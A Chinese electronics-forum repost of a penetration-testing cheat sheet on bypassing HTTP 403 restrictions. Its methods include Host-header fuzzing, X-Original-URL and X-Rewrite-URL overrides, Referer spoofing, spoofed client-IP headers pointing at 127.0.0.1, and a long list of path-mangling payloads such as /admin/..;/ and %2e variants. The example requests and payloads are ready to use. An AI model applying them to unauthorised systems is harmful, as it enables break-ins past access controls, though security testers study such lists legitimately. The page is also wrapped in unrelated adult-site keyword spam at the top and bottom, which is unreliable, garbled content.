在线观看www成人影院-在线观看www日本免费网站-在线观看www视频-在线观看操-欧美18在线-欧美1级

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認識你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

滲透測試如何利用403頁面

jf_Fo0qk3ln ? 來源:xpshuai.cn ? 2023-01-05 10:11 ? 次閱讀

0x01 前言




做滲透時經(jīng)常會碰到掃到的資產(chǎn)403的情況,特別是資產(chǎn)微乎其微的情況下,面試有時也會問到,這里做個總結(jié)!

0x02 利用姿勢




1.端口利用

掃描主機端口,找其它開放web服務(wù)的端口,訪問其端口,挑軟柿子。

2.修改HOST

Host在請求頭中的作用:在一般情況下,幾個網(wǎng)站可能會部署在同一個服務(wù)器上,或者幾個web系統(tǒng)共享一個服務(wù)器,通過host頭來指定應(yīng)該由哪個網(wǎng)站或者web系統(tǒng)來處理用戶的請求。而很多WEB應(yīng)用通過獲取HTTP HOST頭來獲得當前請求訪問的位置,但是很多開發(fā)人員并未意識到HTTP HOST頭由用戶控制,從安全角度來講,任何用戶輸入都是認為不安全的。

修改客戶端請求頭中的Host可以通過修改Host值修改為子域名或者ip來繞過來進行繞過二級域名;首先對該目標域名進行子域名收集,整理好子域名資產(chǎn)(host字段同樣支持IP地址)。先Fuzz測試跑一遍收集到的子域名,這里使用的是Burp的Intruder功能。若看到一個服務(wù)端返回200的狀態(tài)碼,即表面成功找到一個在HOST白名單中的子域名。我們利用firefox插件來修改HOST值,成功繞過訪問限制。

3.覆蓋請求URL

嘗試使用X-Original-URLX-Rewrite-URL標頭繞過Web服務(wù)器的限制。通過支持X-Original-URLX-Rewrite-URL標頭,用戶可以使用這倆請求標頭覆蓋請求URL中的路徑,嘗試繞過對更高級別的緩存和Web服務(wù)器的限制

Request
GET /auth/login HTTP/1.1
Response
HTTP/1.1 403 Forbidden

Reqeust
GET / HTTP/1.1
X-Original-URL: /auth/login
Response
HTTP/1.1 200 OK

或者:

Reqeust
GET / HTTP/1.1
X-Rewrite-URL: /auth/login
Response
HTTP/1.1 200 OK


4.Referer標頭繞過

嘗試使用Referer標頭繞過Web服務(wù)器的限制。

介紹:Referer請求頭包含了當前請求頁面的來源頁面的地址,即表示當前頁面是通過此來源頁面里的鏈接進入的。服務(wù)端一般使用Referer請求頭識別訪問來源。

Request
GET /auth/login HTTP/1.1
Host: xxx
Response
HTTP/1.1 403 Forbidden

Reqeust
GET / HTTP/1.1
Host: xxx
ReFerer//xxx/auth/login
Response
HTTP/1.1 200 OK

或者

Reqeust
GET /auth/login HTTP/1.1
Host: xxx
ReFerer//xxx/auth/login
Response
HTTP/1.1 200 OK


5.代理IP

一般開發(fā)者會通過Nginx代理識別訪問端IP限制對接口的訪問,嘗試使用X-Forwarded-ForX-Forwared-Host等標頭繞過Web服務(wù)器的限制。

X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwared-Host: 127.0.0.1
X-Host: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1

如:

Request
GET /auth/login HTTP/1.1
Response
HTTP/1.1 401 Unauthorized

Reqeust
GET /auth/login HTTP/1.1
X-Custom-IP-Authorization: 127.0.0.1
Response
HTTP/1.1 200 OK


6.擴展名繞過

基于擴展名,用于繞過403受限制的目錄。


	

site.com/admin => 403 site.com/admin/ => 200 site.com/admin// => 200 site.com//admin// => 200 site.com/admin/* => 200 site.com/admin/*/ => 200 site.com/admin/. => 200 site.com/admin/./ => 200 site.com/./admin/./ => 200 site.com/admin/./. => 200 site.com/admin/./. => 200 site.com/admin? => 200 site.com/admin?? => 200 site.com/admin??? => 200 site.com/admin..;/ => 200 site.com/admin/..;/ => 200 site.com/%2f/admin => 200 site.com/%2e/admin => 200 site.com/admin%20/ => 200 site.com/admin%09/ => 200 site.com/%20admin%20/ => 200


7.掃描的時候 遇到403了,上目錄掃描工具,掃目錄,掃文件(記住,掃描的時候要打開探測403,因為有些網(wǎng)站的目錄沒有權(quán)限訪問會顯示403,但是在這個目錄下面的文件,我們或許能掃描到并訪問 )


聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報投訴
  • 服務(wù)器
    +關(guān)注

    關(guān)注

    13

    文章

    9723

    瀏覽量

    87422
  • URL
    URL
    +關(guān)注

    關(guān)注

    0

    文章

    139

    瀏覽量

    15802
  • 滲透
    +關(guān)注

    關(guān)注

    0

    文章

    21

    瀏覽量

    6379

原文標題:滲透測試如何利用403頁面

文章出處:【微信號:菜鳥學(xué)信安,微信公眾號:菜鳥學(xué)信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。

收藏 人收藏

    評論

    相關(guān)推薦
    熱點推薦

    NC403(C50)高性能噪聲二極管現(xiàn)貨庫存

    NC403(C50)高性能噪聲二極管現(xiàn)貨庫存NC403(C50)是Noisecom推出的一款高性能微波噪聲二極管,專為射頻和微波應(yīng)用設(shè)計。NC403(C50)采用C50封裝,適用于需要表面貼裝
    發(fā)表于 06-03 10:31

    如何在KaihongOS操作系統(tǒng)中寫一個動態(tài)的頁面

    的轉(zhuǎn)場動效等,推薦使用Navigation。 第一個頁面跳轉(zhuǎn)到第二個頁面。 在第一個頁面中,跳轉(zhuǎn)按鈕綁定onClick事件,點擊按鈕時跳轉(zhuǎn)到第二。Index.ets文件的示例
    發(fā)表于 04-25 06:42

    Allegro Skill布局功能之按擺放器件介紹

    在電路設(shè)計中,原理圖中常以一個功能模塊的器件繪制在同一頁面上,因此,通常將器件在pcb按擺放在一起,更方便進行模塊化布局。為此,F(xiàn)any skill添加了將pcb中的器件按照原理圖,進行分類擺放的功能。需要注意的是,此功能需
    的頭像 發(fā)表于 04-23 17:10 ?471次閱讀
    Allegro Skill布局功能之按<b class='flag-5'>頁</b>擺放器件介紹

    安全檢測 高效合規(guī) | 經(jīng)緯恒潤重磅推出PeneTrix滲透測試平臺

    在汽車智能化進程加速的今天,汽車電子控制系統(tǒng)(ECU)開發(fā)與信息安全合規(guī)性驗證正面臨三重挑戰(zhàn):法規(guī)更新頻繁、威脅場景日益復(fù)雜、傳統(tǒng)滲透測試流程耗時費力。面對這些難題,經(jīng)緯恒潤基于多年的研發(fā)經(jīng)驗與技術(shù)
    的頭像 發(fā)表于 03-17 17:04 ?680次閱讀
    安全檢測 高效合規(guī) | 經(jīng)緯恒潤重磅推出PeneTrix<b class='flag-5'>滲透</b><b class='flag-5'>測試</b>平臺

    LED紅墨水測試

    紅墨水滲透測試紅墨水滲透測試(RedDyePenetrationTest),也稱為LED紅墨水試驗,是一種用于評估電子電路板組裝(PCBAssembly)中表面貼裝技術(shù)(SMT)焊接質(zhì)
    的頭像 發(fā)表于 02-08 12:14 ?647次閱讀
    LED紅墨水<b class='flag-5'>測試</b>

    GD32F30x和GD32F403硬件開發(fā)指南

    電子發(fā)燒友網(wǎng)站提供《GD32F30x和GD32F403硬件開發(fā)指南.pdf》資料免費下載
    發(fā)表于 02-07 17:21 ?2次下載
    GD32F30x和GD32F<b class='flag-5'>403</b>硬件開發(fā)指南

    GD32F403xx數(shù)據(jù)表

    電子發(fā)燒友網(wǎng)站提供《GD32F403xx數(shù)據(jù)表.pdf》資料免費下載
    發(fā)表于 01-22 17:37 ?0次下載
    GD32F<b class='flag-5'>403</b>xx數(shù)據(jù)表

    Web安全之滲透測試基礎(chǔ)與實踐

    在網(wǎng)絡(luò)安全領(lǐng)域,Web滲透測試是發(fā)現(xiàn)Web應(yīng)用漏洞的重要手段。下面介紹滲透測試的基礎(chǔ)和實踐。 信息收集是滲透
    的頭像 發(fā)表于 01-22 09:33 ?416次閱讀

    AT32F403A_407固件庫驅(qū)動程序發(fā)行說明

    電子發(fā)燒友網(wǎng)站提供《AT32F403A_407固件庫驅(qū)動程序發(fā)行說明.zip》資料免費下載
    發(fā)表于 12-10 15:57 ?1次下載

    HarmonyOS Web頁面加載的原理和優(yōu)化方法

    在移動互聯(lián)網(wǎng)時代,應(yīng)用的頁面渲染速度對于用戶體驗至關(guān)重要。相對于原生頁面,Web頁面的性能存在多方面的技術(shù)挑戰(zhàn)。本文以HarmonyOS的ArkWeb組件為基礎(chǔ),介紹了Web頁面加載中
    的頭像 發(fā)表于 12-05 15:14 ?976次閱讀
    HarmonyOS Web<b class='flag-5'>頁面</b>加載的原理和優(yōu)化方法

    什么是滲透作用_金屬封裝又是如何發(fā)生滲透

    ? 滲透作用使得芯片封裝中沒有絕對的氣密性封裝,那么什么是滲透作用?金屬封裝又是如何發(fā)生滲透的呢??? 滲透:氣體從密度大的一側(cè)向密度小的一側(cè)滲入、擴散、通過、和逸出固體阻擋層的過程。
    的頭像 發(fā)表于 11-22 10:27 ?881次閱讀

    TLV320ADC3101可以正確設(shè)置和讀寫PAGE0的數(shù)據(jù),但是讀取PAGE4上的寄存器值都為0,為什么?

    如題,通過csl庫提供的程序,可以正確設(shè)置和讀寫PAGE0的數(shù)據(jù),但是讀取PAGE4上的寄存器值都為0,很奇怪,數(shù)據(jù)手冊好像也沒有說讀取PAGE4與讀取其他頁面上的寄存器有什么不同,不知道有沒有誰遇到同樣問題,在線等!!!
    發(fā)表于 10-30 08:02

    TFP501、TFP403參考設(shè)計

    電子發(fā)燒友網(wǎng)站提供《TFP501、TFP403參考設(shè)計.pdf》資料免費下載
    發(fā)表于 09-29 09:53 ?0次下載
    TFP501、TFP<b class='flag-5'>403</b>參考設(shè)計

    Linux內(nèi)核中的頁面分配機制

    Linux內(nèi)核中是如何分配出頁面的,如果我們站在CPU的角度去看這個問題,CPU能分配出來的頁面是以物理頁面為單位的。也就是我們計算機中常講的分頁機制。本文就看下Linux內(nèi)核是如何管理,釋放和分配這些物理
    的頭像 發(fā)表于 08-07 15:51 ?582次閱讀
    Linux內(nèi)核中的<b class='flag-5'>頁面</b>分配機制

    TFP403數(shù)字接收器數(shù)據(jù)表

    電子發(fā)燒友網(wǎng)站提供《TFP403數(shù)字接收器數(shù)據(jù)表.pdf》資料免費下載
    發(fā)表于 06-29 09:33 ?0次下載
    TFP<b class='flag-5'>403</b>數(shù)字接收器數(shù)據(jù)表
    主站蜘蛛池模板: 免费一级欧美在线观看视频片 | 国产人免费人成免费视频 | 色天使在线视频 | 国产午夜精品一区二区 | 久久国产乱子伦精品免费强 | 国产一二三区在线 | 美女用手扒开尿口给男生桶爽 | 狠狠色丁香婷婷综合久久来 | 色播视频在线观看免费 | 东莞a级毛片| 69色视频 | 成人黄色激情网 | 亚洲一区二区三区高清 | 国模私拍一区二区 | 97色婷婷成人综合在线观看 | 免费在线播放视频 | 日本三级在线 | 在线观看的黄网 | 欧美黄色免费网址 | 久青草国产高清在线视频 | 性欧美精品久久久久久久 | 亚洲三级小视频 | 手机看片久久青草福利盒子 | 天天弄天天操 | 97久久天天综合色天天综合色hd | 色中色综合 | 免费看黄色网页 | 在线资源天堂 | 亚洲人成电影在线观看网 | 亚洲第一色在线 | 在线免费观看视频 | 成人窝窝午夜看片 | 视频在线观看一区二区三区 | 黄色日本视频 | 午夜影院美女 | 黄蓉吕文德欲乱系列小说 | 美女免费黄 | 伊人成综合 | 黄色男人的天堂 | 四虎精品久久久久影院 | 久久手机免费视频 |